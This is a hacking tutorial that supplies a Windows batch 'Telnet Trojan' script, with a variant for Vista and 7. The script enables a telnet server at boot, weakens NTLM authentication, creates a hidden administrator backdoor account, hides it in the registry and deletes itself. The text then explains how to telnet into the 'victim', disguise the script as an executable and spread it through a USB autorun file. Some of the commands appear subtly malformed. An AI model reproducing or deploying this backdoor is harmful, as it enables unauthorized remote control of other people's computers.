Following batch script will act as Telnet Trojan to any windows XP system, the best
part of it is it's fully undetectable to all ant-virus programs. Copy following lines in
notepad and save with any name with .bat extension for example Trojan.bat.
Code:
@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3l /t
REG_DWORD /d 00000000
del trojan.bat
The first line will keep echo of commands off.
Second line will ask windows to start telnet server every time the system starts.
Third line asks system to start telnet server for current windows NT systems.
Fourth line will disable NTLM hash security to password file.
Fifth line will add an stream mode to telnet.
Sixth and seventh line will add a user with name h4xor_(od3 having password
12345.
Eighth line will add h4xor_(od3 to administrator group.
Ninth line will ask system to hide existence of user Devil.
Tenth line will delete Trojan script from victim's system.
You can replace word h4xor_(od3 with user name of your choice.
Now you might ask a question why above script will not work on Windows Vista and
Windows 7. That's because by default Vista and 7 doesn't install telnet packages.
For making above script work on them you have to add some more line but the
victim system should be connected to the internet while running script.
Code:
@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user h4xor_(od3/add
net user h4xor_(od3 12345
net localgroup administrators h4xor_(od3 /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v h4xor_(od3 /t
REG_DWORD /d 00000000
Now note that above script will work if it is ran with administrative privileges. That
means if user account is not administrator then it'll not work. After running this
script you can connect victim from any platform having Telnet Client by typing
following commands.
C:\>telnet <victim's IP address>
Next above script is very basic example of how to make a Telnet Trojan you can
modify the scripts according to your need but there's still a problem with above
script. Since its a batch script it will surely pop out to tackle that problem. Download
Hidden Bat2EXE maker and convert it into executable file copy it in pen drive create
a autorun.inf for your script in it and send it to your victim.
